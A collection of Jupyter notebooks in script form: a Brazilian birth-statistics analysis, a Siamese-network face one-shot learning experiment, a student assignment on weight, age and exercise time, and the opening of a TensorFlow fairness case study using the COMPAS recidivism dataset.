# Exibir as primeiras linhas do df
df.head() #Ler o inicio
# +
# Trocar o nome das colunas
df.columns=['Ano/Mês', 'Parto_Normal', 'Parto_Cesariano', 'Nâo_Informado', 'Total_de_Partos']
# Exibir as primeiras linhas do df
df.head(12) #Mostrar as 12 linhas
# -
# Descrever colunas numericas
df.describe()
# Listando os partos cesarianos
df['Total_de_Partos'].unique() #Valores unicos
# Contando e ordenando os partos normais
df['Total_de_Partos'].value_counts()
# Plotar o gráfico de total de partos por mês
df['Total_de_Partos'].plot.bar()
# +
# destacando a linha do mês com o maior numero de partos
# Criando um Subconjunto dos dados originais
# criando um novo df
df_março = df[df['Ano/Mês'] == 201703] #não ta entre apas por ser numero
#mostrar o df
df_março.head()
# +
#Excluindo colunas para uma melhor visualização do gráfico
#excluindo oano/mês(ja sabemos que é março), e o total de partos
#temos que o df_março, vai receber um novo df que é o mesmo sem as colunas
df_março = df_março.drop(columns=['Ano/Mês', 'Total_de_Partos'])
#mostrar o df
df_março.head()
# -
#Plotando umg´rafico com a quantidade de cada tipo de parto no mês de Março
df_março.plot.barh(title='Comparação Entre Os Tipos de Parto')
| Nascimentos/csv_nascimentos_DF_2017.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="-sPL7sGBBrkR" colab_type="text"
# ### author: <EMAIL>
# > One-Shot-Learning with Siamese Network on a small Face dataset
# + id="drrk5tlBA65q" colab_type="code" outputId="6aa3bddd-fcaa-48db-f7b3-ff4056203243" colab={"base_uri": "https://localhost:8080/", "height": 55}
# Load the Drive helper and mount
from google.colab import drive
# This will prompt for authorization.
drive.mount('/content/drive')
# + id="hfMNFh4HBhyc" colab_type="code" outputId="c8e8ff7b-81b8-4a06-dd15-eb4b64e4c8c3" colab={"base_uri": "https://localhost:8080/", "height": 35}
% cd /content/drive/My Drive
# + id="l_FCNi_YCpZ4" colab_type="code" outputId="93f25e2d-b8f1-440c-9a1a-a8af57e60086" colab={"base_uri": "https://localhost:8080/", "height": 35}
import os
print(os.stat('data.zip').st_size/1000000000) # GigaBytes (approx)
# + id="vU5UkmkZCu8n" colab_type="code" colab={}
# unzip to train folder
data_seg = 'data.zip'
import zipfile
zip_ref = zipfile.ZipFile(data_seg, 'r')
zip_ref.extractall('train_face')
zip_ref.close()
# + id="wO_OjVytDFBA" colab_type="code" outputId="70fafe44-2ec1-4527-e321-759f8ef401be" colab={"base_uri": "https://localhost:8080/", "height": 35}
% cd /content/drive/My Drive/train_face/data
# + id="5QIYklcCDG5W" colab_type="code" outputId="efe57bd5-0c16-443b-c6ca-99931b208b9e" colab={"base_uri": "https://localhost:8080/", "height": 35}
# ! ls
# + id="qVNJQCYhDMZ_" colab_type="code" colab={}
# 4 classes for faces of 4 different people
# + id="m5k7_UYJD1yE" colab_type="code" outputId="03a7a5bf-0543-4e33-f69b-a066403ba2fc" colab={"base_uri": "https://localhost:8080/", "height": 350}
import cv2
import matplotlib.pyplot as plt
a = cv2.imread('0/rita0.jpg')
plt.imshow(cv2.resize(a, (100, 150)))
plt.show()
# + id="BOqT6riwmc5U" colab_type="code" outputId="e8ef8e93-4f05-4000-a6f8-567314d3c749" colab={"base_uri": "https://localhost:8080/", "height": 35}
# siamese net
# https://github.com/sorenbouma/keras-oneshot/blob/master/SiameseNet.ipynb
from keras.layers import Input, Conv2D, Lambda, merge, Dense, Flatten,MaxPooling2D, Dropout
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras import backend as K
from keras.optimizers import SGD,Adam
from keras.losses import binary_crossentropy
import numpy.random as rng
import numpy as np
import os
import pickle
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.utils import shuffle
# %matplotlib inline
def W_init(shape,name=None):
"""Initialize weights as in paper"""
values = rng.normal(loc=0,scale=1e-2,size=shape)
return K.variable(values,name=name)
#//TODO: figure out how to initialize layer biases in keras.
def b_init(shape,name=None):
"""Initialize bias as in paper"""
values=rng.normal(loc=0.5,scale=1e-2,size=shape)
return K.variable(values,name=name)
input_shape = (100, 150, 1)
left_input = Input(input_shape)
right_input = Input(input_shape)
#build convnet to use in each siamese 'leg'
convnet = Sequential()
convnet.add(Conv2D(32,(3,3),activation='relu',input_shape=input_shape,
kernel_initializer=W_init,kernel_regularizer=l2(2e-4)))
convnet.add(MaxPooling2D())
#convnet.add(Conv2D(64,(3,3),activation='relu',
# kernel_regularizer=l2(2e-4),kernel_initializer=W_init,bias_initializer=b_init))
#convnet.add(MaxPooling2D())
#convnet.add(Conv2D(128,(3,3),activation='relu',kernel_initializer=W_init,kernel_regularizer=l2(2e-4),bias_initializer=b_init))
#convnet.add(MaxPooling2D())
#convnet.add(Conv2D(256,(3,3),activation='relu',kernel_initializer=W_init,kernel_regularizer=l2(2e-4),bias_initializer=b_init))
convnet.add(Flatten())
#convnet.add(Dense(1024,activation="sigmoid",kernel_regularizer=l2(1e-3),kernel_initializer=W_init,bias_initializer=b_init))
#convnet.add(Dropout(0.2))
convnet.add(Dense(10,activation="sigmoid",kernel_regularizer=l2(1e-3),kernel_initializer=W_init,bias_initializer=b_init))
convnet.add(Dropout(0.2))
#call the convnet Sequential model on each of the input tensors so params will be shared
encoded_l = convnet(left_input)
encoded_r = convnet(right_input)
#layer to merge two encoded inputs with the l1 distance between them
L2_layer = Lambda(lambda tensors:K.abs((tensors[0] - tensors[1])*(tensors[0] - tensors[1]))) #
#call this layer on list of two input tensors.
L2_distance = L2_layer([encoded_l, encoded_r])
prediction = Dense(1,activation='sigmoid',bias_initializer=b_init)(L2_distance)
siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)
optimizer = Adam(0.00001)
#//TODO: get layerwise learning rates and momentum annealing scheme described in paperworking
siamese_net.compile(loss="binary_crossentropy",optimizer=optimizer, metrics=['binary_accuracy'])
siamese_net.count_params()
# + id="rJ_IlII7mwdS" colab_type="code" outputId="a18e1f53-e29b-439d-b2c8-4ea1cf9c1160" colab={"base_uri": "https://localhost:8080/", "height": 363}
siamese_net.summary()
# + id="WBoihD1WnK0r" colab_type="code" colab={}
x1 = np.zeros((100,105,105,1), dtype = 'float32')
x2 = np.zeros((100,105,105,1), dtype = 'float32')
x3 = [x1, x2]
x3 = np.array(x3)
y = np.zeros((100,), dtype = 'float32')
# + id="k3Q_reNPnb_s" colab_type="code" outputId="0e8596cd-8afd-4c06-9267-505ab5e1a9bc" colab={"base_uri": "https://localhost:8080/", "height": 35}
x3.shape
# + id="hzTta6e0vmwv" colab_type="code" colab={}
# prepare data
import glob
num_class = 4
files = []
for nc in range(4):
path = str(nc) + '/*'
fimg = []
for f in glob.glob(path):
fimg.append(f)
files.append(fimg)
# + id="taRzHrVIwtit" colab_type="code" outputId="46d87d99-16f9-4251-e894-3b95caa39e3c" colab={"base_uri": "https://localhost:8080/", "height": 55}
print(files)
# + id="tUX0KqJJw_tw" colab_type="code" outputId="416a22d1-11a6-40a7-e6bc-f5bb4c84e469" colab={"base_uri": "https://localhost:8080/", "height": 35}
anchors = [a[0] for a in files]
print(anchors)
# + id="xfnP9O4QxSqQ" colab_type="code" outputId="6d3fe344-4b2f-4397-bd71-6c263059be7f" colab={"base_uri": "https://localhost:8080/", "height": 73}
split_factor = 0.6
split = int(len(files[0])*split_factor)
trains = [a[1:split] for a in files]
tests = [a[split:] for a in files]
print(trains)
print(tests)
# + id="D3MOUzRCzqeM" colab_type="code" outputId="a43b8cd4-fb33-45e9-af4a-345d7332f59b" colab={"base_uri": "https://localhost:8080/", "height": 35}
anchor_imgs = [cv2.resize(cv2.imread(a,0), (100,150)) for a in anchors]
print(len(anchor_imgs))
# + id="ltxhEIYA0X24" colab_type="code" outputId="1b372f47-2fcd-4f85-bfdd-c5234f11618b" colab={"base_uri": "https://localhost:8080/", "height": 53}
train_imgs = [[cv2.resize(cv2.imread(a,0), (100,150)) for a in x] for x in trains]
print(len(train_imgs))
print(len(train_imgs[0]))
# + id="qsSkQrPT1UxH" colab_type="code" outputId="a477002f-83ca-46cf-ebe9-5d8287452445" colab={"base_uri": "https://localhost:8080/", "height": 53}
test_imgs = [[cv2.resize(cv2.imread(a,0), (100,150)) for a in x] for x in tests]
print(len(test_imgs))
print(len(test_imgs[0]))
# + id="nAxIbtnF1k9I" colab_type="code" colab={}
# x1, x2, y
# x1 contains the anchor images
# x2 contains the training/test images
# if x1 and x2 contain the images of same class then y = 1
# if x1 and x2 do not contain the images of same class then y = 0
x1 = []
x2 = []
y = []
for a_class in range(num_class):
# on a specific anchor image of a specific class
for t_class in range(num_class):
for imgs in train_imgs[t_class]:
x1.append(np.reshape(anchor_imgs[a_class], (100,150,1)))
x2.append(np.reshape(imgs, (100,150,1)))
if a_class == t_class:
y.append(1)
else:
y.append(0)
# + id="rifJdY5O3afC" colab_type="code" outputId="bc8d72a7-4446-465a-e348-d838487ef4b9" colab={"base_uri": "https://localhost:8080/", "height": 108}
print(len(x1))
print(len(x2))
print(len(y))
print(x1[0].shape)
print(x2[0].shape)
# + id="DpZhwGG2YdQV" colab_type="code" outputId="91cf70af-e86e-473d-a382-4efcb93ca9ea" colab={"base_uri": "https://localhost:8080/", "height": 35}
x1 = np.array(x1)
x2 = np.array(x2)
y = np.array(y)
x1.shape
# + id="4V781NZKYr3c" colab_type="code" colab={}
x1 = x1/255.
x2 = x2/255.
print(np.max(x1))
print(np.min(x2))
print(np.max(x1))
print(np.min(x2))
print(np.mean(x1))
print(np.mean(x2))
# + id="jrQUHy9byJ71" colab_type="code" colab={}
import random
z = list(zip(x1,x2,y))
random.shuffle(z)
# + id="MKCNNz3lyRqC" colab_type="code" colab={}
x1 = [a[0] for a in z]
x2 = [a[1] for a in z]
y = [a[2] for a in z]
# + id="u-AwXiFMye8i" colab_type="code" outputId="e22c38b6-cb35-48db-aa8d-8a70dd589f06" colab={"base_uri": "https://localhost:8080/", "height": 35}
x1 = np.array(x1)
x2 = np.array(x2)
y = np.array(y)
x1.shape
# + id="f-U8nvI0ymbr" colab_type="code" outputId="9c1832f7-42a2-4715-f69f-1a1bab72cb8b" colab={"base_uri": "https://localhost:8080/", "height": 35}
y.shape
# + id="1R6UHtJ85_Cw" colab_type="code" colab={}
y_cop = y[:]
y_cop[y==1.] = 0.
y_cop[y==0.] = 1.
# + id="xMUeiirKXVrb" colab_type="code" colab={}
class_weight = {0: 1.,
1: 1.}
# + id="RlzbiJN1npRC" colab_type="code" outputId="00178714-c2c7-4026-f46a-94999e3bfab3" colab={"base_uri": "https://localhost:8080/", "height": 1529}
siamese_net.fit([x1, x2],y_cop,epochs = 40, batch_size = 16, verbose = 1, validation_split = 0.3,
class_weight = class_weight, shuffle = True)
# + id="56DukDYnny1h" colab_type="code" colab={}
# x1, x2, y
# x1 contains the anchor images
# x2 contains the training/test images
# if x1 and x2 contain the images of same class then y = 1
# if x1 and x2 do not contain the images of same class then y = 0
x1 = []
x2 = []
y = []
for a_class in range(num_class):
# on a specific anchor image of a specific class
for t_class in range(num_class):
for imgs in train_imgs[t_class]:
x1.append(np.reshape(anchor_imgs[a_class], (100,150,1)))
x2.append(np.reshape(imgs, (100,150,1)))
if a_class == t_class:
y.append(1)
else:
y.append(0)
| Face_OneShot.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="Okfr_uhwhS1X" colab_type="text"
# # Lambda School Data Science - Making Data-backed Assertions
#
# This is, for many, the main point of data science - to create and support reasoned arguments based on evidence. It's not a topic to master in a day, but it is worth some focused time thinking about and structuring your approach to it.
# + [markdown] id="lOqaPds9huME" colab_type="text"
# ## Assignment - what's going on here?
#
# Consider the data in `persons.csv` (already prepared for you, in the repo for the week). It has four columns - a unique id, followed by age (in years), weight (in lbs), and exercise time (in minutes/week) of 1200 (hypothetical) people.
#
# Try to figure out which variables are possibly related to each other, and which may be confounding relationships.
#
# Try and isolate the main relationships and then communicate them using crosstabs and graphs. Share any cool graphs that you make with the rest of the class in Slack!
# + id="TGUS79cOhPWj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="a3f52b56-5444-423e-8130-39f7837b903d"
# loading the data from github
import pandas as pd
# !wget https://raw.githubusercontent.com/bs2537/DS-Unit-1-Sprint-1-Dealing-With-Data/master/module3-databackedassertions/persons.csv
# + id="bgF_p80SWGMR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="bbe810d0-3db8-43fc-f6d2-8d5229481006"
df = pd.read_csv("https://raw.githubusercontent.com/bs2537/DS-Unit-1-Sprint-1-Dealing-With-Data/master/module3-databackedassertions/persons.csv", error_bad_lines= False)
df.head()
# + id="67a8-uK8bfJH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="29388498-b811-49ad-b6ee-ea6848c1084a"
# finding null values
df.isna().sum()
# + id="_QBuGalTb_z1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f986509d-36a5-43e0-ac4d-3863938a0428"
# shape of data
df.shape
# + id="LBdtdpubcDV_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 297} outputId="72c1c6bc-0f24-4305-ab77-a44dd3cfdf8b"
# summary statistics
df.describe()
# + id="Xv6UqYezb5B_" colab_type="code" colab={}
# selecting only age, weight and exercise time from the dataframe and dropping the id column (which is spurious)
df[['age', 'weight', 'exercise_time']]
# + id="dNLG-nxBdaUf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="00ce0863-9320-46ed-83df-cd625a87cc0d"
# plotting using matplotlib and seaborn style
import matplotlib as plt
import seaborn
df.plot(x='weight', y='exercise_time')
# There seems to some inverse correlation between these two variables from the plot below which is understandable
# People who have more exercise time are expected to have lower weight
# from the plot, the inverse correlation starts at weights higher than 140 pounds.
# + id="0iU25KCve6IH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="9547de91-4895-4ec4-a6c9-6a73cb49a4ab"
# next I want to see if age has any effect on increase in weight
df.plot(x='age', y='weight', color='b')
#There does not seem to be a correlation between these two variables
# + id="0qRMkeLagDyY" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="28a58918-613e-4b01-d51c-d7f8abd76165"
# next I want to see if age has any effect on exercise time (maybe older people do less exercise????)
df.plot(x='age', y='exercise_time', color='g')
# it seems like as persons grow older above age 57-58 years, they start doing less exercise from this plot
# + [markdown] id="BT9gdS7viJZa" colab_type="text"
# ### Assignment questions
#
# After you've worked on some code, answer the following questions in this text block:
#
# 1. What are the variable types in the data?
# 2. What are the relationships between the variables?
# 3. Which relationships are "real", and which spurious?
#
# + [markdown] id="Jwbf1uPRsHlx" colab_type="text"
# 1. The id variable is ordinal, weight, age and exercise time are numerical.
# 2. The relationships between variables are mentioned under the notes in the code columns above.
# 3. Relationship between weight and exercise time appears real from the plot. There also seems to be a relation between age and exercise time after a certain age as mentioned in the comments. The relationship between age and weight is spurious.
#
# To find the statistical signficance of the relationship between these variables and find p value, I will have to run linear regression which I will do later today.
#
# + id="1GoaSF4btAYf" colab_type="code" colab={}
# Linear regression between weight and exercise time
import numpy as np
from sklearn.linear_model import LinearRegression
# + id="M06ir06StlRa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="ffde89be-a00b-4889-db62-47e8f384c6b2"
X = df[['weight']].as_matrix()
print (X)
# + id="v9xGdqvWwBhP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="ac6d62a2-9a78-412c-c9ad-ce4f29af30ed"
Y = df[['exercise_time']].as_matrix().reshape(-1, 1)
print (Y)
# + id="xX_ORbHywokR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="c512c5d1-b4dc-464d-b68a-cd9b1a851d4d"
model = LinearRegression().fit(X, Y)
r_sq = model.score(X, Y)
print ('Coefficient of determination, R2:', r_sq)
# + [markdown] id="kpBH0pJTzudR" colab_type="text"
# The R2 is not very high, so not a very strong relationship but to find the degree of statistical significance, we have to find the p value and the confidence intervals. I will do these later, but will first find the model intercept and model coefficient.
#
# + id="AQkGB_Z90BwP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="16c67d18-a3a6-4927-be75-e176c799dc13"
regr = LinearRegression()
model = regr.fit(X, Y)
print('model intercept', model.intercept_)
print ('model coefficient', model.coef_)
# + [markdown] id="_XXg2crAipwP" colab_type="text"
# ## Stretch goals and resources
#
# Following are *optional* things for you to take a look at. Focus on the above assignment first, and make sure to commit and push your changes to GitHub.
#
# - [Spurious Correlations](http://tylervigen.com/spurious-correlations)
# - [NIH on controlling for confounding variables](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4017459/)
#
# Stretch goals:
#
# - Produce your own plot inspired by the Spurious Correlation visualizations (and consider writing a blog post about it - both the content and how you made it)
# - Pick one of the techniques that NIH highlights for confounding variables - we'll be going into many of them later, but see if you can find which Python modules may help (hint - check scikit-learn)
| module3-databackedassertions/Bhav_Sep10_2019_LS_DS_113_Making_Data_backed_Assertions_Assignment.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="ueCj9KW2QTCP"
# ##### Copyright 2020 The TensorFlow Authors.
# + id="wFk_qMvcQZ8S"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="HKYXncPn7mSs"
# # Fairness Indicators Lineage Case Study
# + [markdown] id="d7A099z02DB6"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/responsible_ai/fairness_indicators/tutorials/Fairness_Indicators_Lineage_Case_Study"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/fairness-indicators/blob/master/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/fairness-indicators/tree/master/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/fairness-indicators/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# <td>
# <a href="https://tfhub.dev/google/random-nnlm-en-dim128/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a>
# </td>
# </table>
# + [markdown] id="lOKe4l_TSoKy"
# > Warning: Estimators are deprecated (not recommended for new code). Estimators run `v1.Session`-style code which is more difficult to write correctly, and can behave unexpectedly, especially when combined with TF 2 code. Estimators do fall under our [compatibility guarantees](https://tensorflow.org/guide/versions), but will receive no fixes other than security vulnerabilities. See the [migration guide](https://tensorflow.org/guide/migrate) for details.
#
# <!--
# TODO(b/192933099): update this to use keras instead of estimators.
# -->
# + [markdown] id="oZWUeUxjlMjQ"
# ## COMPAS Dataset
# [COMPAS](https://www.propublica.org/datastore/dataset/compas-recidivism-risk-score-data-and-analysis) (Correctional Offender Management Profiling for Alternative Sanctions) is a public dataset, which contains approximately 18,000 criminal cases from Broward County, Florida between January, 2013 and December, 2014. The data contains information about 11,000 unique defendants, including criminal history demographics, and a risk score intended to represent the defendant’s likelihood of reoffending (recidivism). A machine learning model trained on this data has been used by judges and parole officers to determine whether or not to set bail and whether or not to grant parole.
#
# In 2016, [an article published in ProPublica](https://www.propublica.org/article/machine-bias-risk-assessments-in-criminal-sentencing) found that the COMPAS model was incorrectly predicting that African-American defendants would recidivate at much higher rates than their white counterparts while Caucasian would not recidivate at a much higher rate. For Caucasian defendants, the model made mistakes in the opposite direction, making incorrect predictions that they wouldn’t commit another crime. The authors went on to show that these biases were likely due to an uneven distribution in the data between African-Americans and Caucasian defendants. Specifically, the ground truth label of a negative example (a defendant **would not** commit another crime) and a positive example (defendant **would** commit another crime) were disproportionate between the two races. Since 2016, the COMPAS dataset has appeared frequently in the ML fairness literature <sup>1, 2, 3</sup>, with researchers using it to demonstrate techniques for identifying and remediating fairness concerns. This [tutorial from the FAT* 2018 conference](https://youtu.be/hEThGT-_5ho?t=1) illustrates how COMPAS can dramatically impact a defendant’s prospects in the real world.
#
# It is important to note that developing a machine learning model to predict pre-trial detention has a number of important ethical considerations. You can learn more about these issues in the Partnership on AI “[Report on Algorithmic Risk Assessment Tools in the U.S. Criminal Justice System](https://www.partnershiponai.org/report-on-machine-learning-in-risk-assessment-tools-in-the-u-s-criminal-justice-system/).” The Partnership on AI is a multi-stakeholder organization -- of which Google is a member -- that creates guidelines around AI.
#
# We’re using the COMPAS dataset only as an example of how to identify and remediate fairness concerns in data. This dataset is canonical in the algorithmic fairness literature.
#
# ## About the Tools in this Case Study
# * **[TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)** is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework and shared libraries to integrate common components needed to define, launch, and monitor your machine learning system.
#
# * **[TensorFlow Model Analysis](https://www.tensorflow.org/tfx/tutorials/model_analysis/tfma_basic)** is a library for evaluating machine learning models. Users can evaluate their models on a large amount of data in a distributed manner and view metrics over different slices within a notebook.
#
# * **[Fairness Indicators](https://www.tensorflow.org/tfx/guide/fairness_indicators)** is a suite of tools built on top of TensorFlow Model Analysis that enables regular evaluation of fairness metrics in product pipelines.
#
# * **[ML Metadata](https://www.tensorflow.org/tfx/guide/mlmd)** is a library for recording and retrieving the lineage and metadata of ML artifacts such as models, datasets, and metrics. Within TFX ML Metadata will help us understand the artifacts created in a pipeline, which is a unit of data that is passed between TFX components.
#
# * **[TensorFlow Data Validation](https://www.tensorflow.org/tfx/guide/tfdv)** is a library to analyze your data and check for errors that can affect model training or serving.
#
#
# ## Case Study Overview
#
# For the duration of this case study we will define “fairness concerns” as a bias within a model that negatively impacts a slice within our data. Specifically, we’re trying to limit any recidivism prediction that could be biased towards race.
#
# The walk through of the case study will proceed as follows:
#
# 1. Download the data, preprocess, and explore the initial dataset.
# 2. Build a TFX pipeline with the COMPAS dataset using a Keras binary classifier.
# 3. Run our results through TensorFlow Model Analysis, TensorFlow Data Validation, and load Fairness Indicators to explore any potential fairness concerns within our model.
# 4. Use ML Metadata to track all the artifacts for a model that we trained with TFX.
# 5. Weight the initial COMPAS dataset for our second model to account for the uneven distribution between recidivism and race.
# 6. Review the performance changes within the new dataset.
# 7. Check the underlying changes within our TFX pipeline with ML Metadata to understand what changes were made between the two models.
#
# ## Helpful Resources
# This case study is an extension of the below case studies. It is recommended working through the below case studies first.
# * [TFX Pipeline Overview](https://github.com/tensorflow/workshops/blob/master/tfx_labs/Lab_1_Pipeline_in_Colab.ipynb)
# * [Fairness Indicator Case Study](https://github.com/tensorflow/fairness-indicators/blob/master/g3doc/tutorials/Fairness_Indicators_Example_Colab.ipynb)
# * [TFX Data Validation](https://github.com/tensorflow/tfx/blob/master/tfx/examples/airflow_workshop/notebooks/step3.ipynb)
#
#
# ## Setup
# To start, we will install the necessary packages, download the data, and import the required modules for the case study.
#
# To install the required packages for this case study in your notebook run the below PIP command.
#
# **Note:** See [here](https://github.com/tensorflow/tfx#compatible-versions) for a reference on compatibility between different versions of the libraries used in this case study.
#
# ___
#
# 1. <NAME>., <NAME>., <NAME>. (2017). Achieving Fairness Through Adversarial Learning: an Application to Recidivism Prediction. https://arxiv.org/abs/1807.00199.
#
# 2. <NAME>., <NAME>., (2017). Fairer and more accurate, but for whom? https://arxiv.org/abs/1707.00046.
#
# 3. <NAME> al., (2017), Fairness in Criminal Justice Risk Assessments: The State of the Art, https://arxiv.org/abs/1703.09207.
#
#
# + cellView="both" id="42BmC-ctlMjR"
# !python -m pip install -q -U \
# tfx \
# tensorflow-model-analysis \
# tensorflow-data-validation \
# tensorflow-metadata \
# tensorflow-transform \
# ml-metadata \
# tfx-bsl
# + id="yeS4Xy2MlMjW"
import os
import tempfile
import six.moves.urllib as urllib
from ml_metadata.metadata_store import metadata_store
from ml_metadata.proto import metadata_store_pb2
import pandas as pd
from google.protobuf import text_format
from sklearn.utils import shuffle
import tensorflow as tf
import tensorflow_data_validation as tfdv
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis.addons.fairness.post_export_metrics import fairness_indicators
from tensorflow_model_analysis.addons.fairness.view import widget_view
import tfx
from tfx.components.evaluator.component import Evaluator
from tfx.components.example_gen.csv_example_gen.component import CsvExampleGen
from tfx.components.schema_gen.component import SchemaGen
from tfx.components.statistics_gen.component import StatisticsGen
from tfx.components.trainer.component import Trainer
from tfx.components.transform.component import Transform
from tfx.orchestration.experimental.interactive.interactive_context import InteractiveContext
from tfx.proto import evaluator_pb2
from tfx.proto import trainer_pb2
# + [markdown] id="YZQLS05WlMjV"
# ## Download and preprocess the dataset
#
# + id="7uOVs7WJlMjl"
# Download the COMPAS dataset and setup the required filepaths.
_DATA_ROOT = tempfile.mkdtemp(prefix='tfx-data')
_DATA_PATH = 'https://storage.googleapis.com/compas_dataset/cox-violent-parsed.csv'
_DATA_FILEPATH = os.path.join(_DATA_ROOT, 'compas-scores-two-years.csv')
data = urllib.request.urlopen(_DATA_PATH)
_COMPAS_DF = pd.read_csv(data)
# To simpliy the case study, we will only use the columns that will be used for
# our model.
_COLUMN_NAMES = [
'age',
'c_charge_desc',
'c_charge_degree',
'c_days_from_compas',
'is_recid',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'r_days_from_arrest',
'race',
'sex',
'vr_charge_desc',
]
_COMPAS_DF = _COMPAS_DF[_COLUMN_NAMES]
# We will use 'is_recid' as our ground truth lable, which is boolean value
# indicating if a defendant committed another crime. There are some rows with -1
# indicating that there is no data. These rows we will drop from training.
_COMPAS_DF = _COMPAS_DF[_COMPAS_DF['is_recid'] != -1]
# Given the distribution between races in this dataset we will only focuse on
# recidivism for African-Americans and Caucasians.
_COMPAS_DF = _COMPAS_DF[
_COMPAS_DF['race'].isin(['African-American', 'Caucasian'])]
# Adding we weight feature that will be used during the second part of this
# case study to help improve fairness concerns.
_COMPAS_DF['sample_weight'] = 0.8
# Load the DataFrame back to a CSV file for our TFX model.
_COMPAS_DF.to_csv(_DATA_FILEPATH, index=False, na_rep='')
# + [markdown] id="JyCQbe5RlMjn"
# ## Building a TFX Pipeline
#
# ---
# There are several [TFX Pipeline Components](https://www.tensorflow.org/tfx/guide#tfx_pipeline_components) that can be used for a production model, but for the purpose the this case study will focus on using only the below components:
# * **ExampleGen** to read our dataset.
# * **StatisticsGen** to calculate the statistics of our dataset.
# * **SchemaGen** to create a data schema.
# * **Transform** for feature engineering.
# * **Trainer** to run our machine learning model.
#
# ## Create the InteractiveContext
#
# To run TFX within a notebook, we first will need to create an `InteractiveContext` to run the components interactively.
#
# `InteractiveContext` will use a temporary directory with an ephemeral ML Metadata database instance. To use your own pipeline root or database, the optional properties `pipeline_root` and `metadata_connection_config` may be passed to `InteractiveContext`.
# + id="XVMS3Dz7xk8M"
context = InteractiveContext()
# + [markdown] id="NxAOGNCelMjq"
# ### TFX ExampleGen Component
#
# + id="0hzCIDdblMjr"
# The ExampleGen TFX Pipeline component ingests data into TFX pipelines.
# It consumes external files/services to generate Examples which will be read by
# other TFX components. It also provides consistent and configurable partition,
# and shuffles the dataset for ML best practice.
example_gen = CsvExampleGen(input_base=_DATA_ROOT)
context.run(example_gen)
# + [markdown] id="SW23fvThlMjz"
# ### TFX StatisticsGen Component
#
# + id="28D_qP3IlMj0"
# The StatisticsGen TFX pipeline component generates features statistics over
# both training and serving data, which can be used by other pipeline
# components. StatisticsGen uses Beam to scale to large datasets.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
context.run(statistics_gen)
# + [markdown] id="a72E7hT5lMj9"
# ### TFX SchemaGen Component
# + id="dkfTgKCBlMj9"
# Some TFX components use a description of your input data called a schema. The
# schema is an instance of schema.proto. It can specify data types for feature
# values, whether a feature has to be present in all examples, allowed value
# ranges, and other properties. A SchemaGen pipeline component will
# automatically generate a schema by inferring types, categories, and ranges
# from the training data.
infer_schema = SchemaGen(statistics=statistics_gen.outputs['statistics'])
context.run(infer_schema)
# + [markdown] id="43z_COkolMkI"
# ### TFX Transform Component
#
# The `Transform` component performs data transformations and feature engineering. The results include an input TensorFlow graph which is used during both training and serving to preprocess the data before training or inference. This graph becomes part of the SavedModel that is the result of model training. Since the same input graph is used for both training and serving, the preprocessing will always be the same, and only needs to be written once.
#
# The Transform component requires more code than many other components because of the arbitrary complexity of the feature engineering that you may need for the data and/or model that you're working with.
#
# Define some constants and functions for both the `Transform` component and the `Trainer` component. Define them in a Python module, in this case saved to disk using the `%%writefile` magic command since you are working in a notebook.
#
# The transformation that we will be performing in this case study are as follows:
# * For string values we will generate a vocabulary that maps to an integer via tft.compute_and_apply_vocabulary.
# * For integer values we will standardize the column mean 0 and variance 1 via tft.scale_to_z_score.
# * Remove empty row values and replace them with an empty string or 0 depending on the feature type.
# * Append ‘_xf’ to column names to denote the features that were processed in the Transform Component.
#
#
